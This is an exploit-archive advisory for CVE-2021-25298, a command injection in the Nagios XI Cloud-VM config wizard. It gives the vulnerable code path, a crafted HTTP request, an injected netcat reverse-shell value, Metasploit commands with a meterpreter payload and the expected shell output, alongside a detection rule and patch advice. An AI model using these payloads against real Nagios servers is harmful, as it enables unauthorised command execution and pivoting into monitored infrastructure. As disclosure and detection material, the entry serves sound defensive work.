Nagios XI 5.5.6–5.7.5 Authenticated OS Command Injection — Cloud-VM Config Wizard (CVE-2021-25298)
by Matthew Mathur (Rapid7) — Metasploit module; original bug report by fs0c-sh · 2026-07-11
- Severity
- High
- CVE
- CVE-2021-25298
- Category
- web
- Affected product
- Nagios XI — Cloud/VM monitoring configuration wizard (DigitalOcean provider sub-option)
- Affected versions
- Nagios XI 5.5.6 through 5.7.5
- Disclosed
- 2026-07-11
- Patch status
- patched
Tags
References
- https://nvd.nist.gov/vuln/detail/CVE-2021-25298
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog
- http://packetstormsecurity.com/files/170924/Nagios-XI-5.7.5-Remote-Code-Execution.html
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
- https://www.rapid7.com/db/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce/
- https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md
- https://github.com/projectdiscovery/nuclei-templates/pull/6615
Archive entry
intelseclab/poc-archiveMetadata
| Field | Value |
|---|---|
| Date Added | 2026-07-11 |
| Last Updated | N/A |
| Author / Researcher | Matthew Mathur (Rapid7) — Metasploit module; original bug report by fs0c-sh |
| CVE / Advisory | CVE-2021-25298 |
| Category | web |
| Severity | High |
| CVSS Score | 8.8 (CVSS 3.1, AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) |
| Status | Weaponized (public Metasploit module + nuclei templates, in CISA KEV) |
| Tags | nagios-xi, os-command-injection, authenticated, config-wizard, cloud-vm, cwe-78, kev, metasploit |
| Related | Same disclosure, distinct injection points in the same authenticated RCE chain: 2026-07-11_cve-2021-25296-nagios-xi-windowswmi-command-injection (Windows WMI config wizard), 2026-07-11_cve-2021-25297-nagios-xi-switch-command-injection (switch config wizard). All three share the same vulnerability class, the same authenticated HTTP entry point (monitoringwizard.php), and the same public Metasploit module. |
Affected Target
| Field | Value |
|---|---|
| Software / System | Nagios XI — Cloud/VM monitoring configuration wizard (DigitalOcean provider sub-option) |
| Versions Affected | Nagios XI 5.5.6 through 5.7.5 |
| Language / Platform | PHP (Apache/CentOS-based Nagios XI appliance) |
| Authentication Required | Yes — any valid Nagios XI user account (admin or non-admin) |
| Network Access Required | Yes |
Summary
Nagios XI’s “Cloud/VM” configuration wizard (/usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php) performs a reachability check against an attacker-supplied host address by shelling out to ping. The address parameter is concatenated directly into the ping command string passed to PHP’s exec(), with no sanitization. Any authenticated Nagios XI user — including a low-privileged, non-admin account — can submit a crafted address value containing shell metacharacters and execute arbitrary OS commands as the apache user. This is one of three sibling command-injection bugs (CVE-2021-25296/25297/25298) disclosed together, each in a different config wizard, all reachable through the same monitoringwizard.php endpoint. The wizard is reached with wizard=digitalocean (the DigitalOcean provider option served by cloud-vm.inc.php).
Vulnerability Details
Root Cause
Inside cloud-vm.inc.php, the wizard performs a liveness check with exec('ping -W 2 -c 1 ' . $rp_address, ...), where $rp_address is taken directly from the attacker-controlled address HTTP parameter without any validation (“the variable here is not sanitized,” per the public technical write-up). Because the value is concatenated into an unquoted shell command, an attacker does not need to break out of any surrounding quote context (unlike CVE-2021-25297’s switch wizard) — a bare ;-separated command is sufficient.
Attack Vector
An authenticated GET request to /nagiosxi/config/monitoringwizard.php with wizard=digitalocean, nextstep=4, a valid CSRF nsp token for the session, and the target-address parameter — named address on Nagios XI ≤5.5.7, and renamed ip_address on versions after 5.5.7 — set to a value appending a shell command:
ip_address=127.0.0.1;nc -e /bin/sh 127.0.0.1 4445;
No admin privileges are required — any valid, low-privileged Nagios XI login is sufficient, satisfying PR:L in the CVSS vector. This CVE has the highest EPSS score of the three sibling bugs (0.752), likely reflecting its simpler, unquoted injection primitive.
Impact
Remote code execution as the apache user on the Nagios XI host, with the same downstream risk (config/credential access, pivot to monitored infrastructure, potential local root) as the sibling CVE-2021-25296/25297 wizards.
Environment / Lab Setup
OS: Official Nagios XI OVA/ISO, versions 5.5.6 - 5.7.5 (tested against CentOS 7 minimal per the Metasploit module notes)
Target: Nagios XI web UI at https://<target>/nagiosxi/
Attacker: Metasploit Framework 6.x, or curl/Python with a valid Nagios XI login
Tools: msfconsole, curl, Burp Suite
Setup Steps
| |
Proof of Concept
Step-by-Step Reproduction
Authenticate — Log in to Nagios XI with any valid user account to obtain session cookies and extract the CSRF
nsptoken embedded in the authenticated pages (the Metasploit module’sauthenticate()helper does this automatically).Trigger the Cloud-VM wizard (DigitalOcean option), step 4 — Send an authenticated
GETrequest tomonitoringwizard.phpwith the wizard-specific parameters, injecting a shell command via the address parameter (name depends on version —addressfor ≤5.5.7,ip_addressfor later builds):1 2 3GET /nagiosxi/config/monitoringwizard.php?update=1&nsp=<csrf_token>&nextstep=4&wizard=digitalocean&ip_address=127.0.0.1%3Bid%3B HTTP/1.1 Host: <target> Cookie: <auth_cookies>Observe execution — The Nagios XI backend runs the
ping-based reachability check viaexec(), which now also executes the injected command (id;or a reverse-shell one-liner) as theapacheuser.
Exploit Code
See nagios_xi_configwizards_authenticated_rce.rb in this folder — mirrored verbatim from the public Rapid7 Metasploit module exploit/linux/http/nagios_xi_configwizards_authenticated_rce, which supports all three sibling CVEs via a TARGET_CVE datastore option. For CVE-2021-25298 it builds the request as follows (excerpted from that module source):
| |
Note the plain ; #{cmd}; suffix (no quote-breakout needed) — because $rp_address is spliced into an unquoted ping command, this is the simplest of the three payload shapes, contrasting with CVE-2021-25297’s \"; <cmd>; quote-breakout against the switch wizard’s quoted sed expression.
Usage:
msf6 > use exploit/linux/http/nagios_xi_configwizards_authenticated_rce
msf6 exploit(...) > set TARGET_CVE CVE-2021-25298
msf6 exploit(...) > set RHOSTS <target>
msf6 exploit(...) > set USERNAME <nagios_user>
msf6 exploit(...) > set PASSWORD <nagios_pass>
msf6 exploit(...) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf6 exploit(...) > run
Expected Output
[*] Sending the payload...
[*] Command shell session / Meterpreter session opened
uid=48(apache) gid=48(apache) groups=48(apache)
Detection & Indicators of Compromise
"GET /nagiosxi/config/monitoringwizard.php?...&wizard=digitalocean&...&ip_address=127.0.0.1%3Bid%3B... HTTP/1.1" 200
SIEM / IDS Rule (example):
alert http any any -> any any (msg:"Nagios XI CVE-2021-25298 cloud-vm wizard command injection attempt"; content:"wizard=digitalocean"; http_uri; pcre:"/(address|ip_address)=[^&]*%3[bB]/U"; sid:9000103;)
Remediation
| Action | Detail |
|---|---|
| Patch | Upgrade to Nagios XI 5.8.0 or later, which validates/sanitizes config-wizard parameters before shell execution. |
| Workaround | Restrict Nagios XI web UI access to trusted admin networks; disable or remove unused config wizards; enforce least-privilege Nagios XI accounts. |
| Config Hardening | Front the Nagios XI web UI with a WAF rule blocking shell metacharacters in monitoringwizard.php query parameters (see nuclei-templates PR referenced below for an active-check detection template). |
References
- CVE-2021-25298 — NVD
- CISA Known Exploited Vulnerabilities Catalog (added 2022-01-18)
- PacketStorm — Nagios XI 5.7.5 Remote Code Execution
- Rapid7 Metasploit module — nagios_xi_configwizards_authenticated_rce.rb
- Rapid7 module database entry
- fs0c-sh original bug report
- projectdiscovery/nuclei-templates PR #6615
Notes
Surfaced via a CVE discovery pass (NVD + CISA KEV + EPSS scoring) on 2026-07-11 and ingested from public sources — this entry was not independently reproduced against a live Nagios XI instance in this repository; the request shape, the version-dependent parameter name (address vs ip_address), the wizard=digitalocean routing, and the unquoted-injection payload form (; <cmd>;) are grounded directly in the actual Rapid7 Metasploit module source (fetched from rapid7/metasploit-framework on GitHub) and corroborated by the PacketStorm/fs0c-sh technical write-up, which independently confirms the ping/exec() sink and the “not sanitized” root cause for this wizard. EPSS score at time of ingestion: 0.752 (the highest of the three sibling CVEs). This CVE has been in the CISA KEV catalog since 2022-01-18, confirming in-the-wild exploitation.
Cross-reference: CVE-2021-25296 (windowswmi wizard, plugin_output_len parameter) and CVE-2021-25297 (switch wizard, address/ip_address parameter with quote-breakout) were disclosed as part of the same batch and share the same authenticated entry point, CSRF-token retrieval flow, and Metasploit module — see the sibling entries linked above.
| |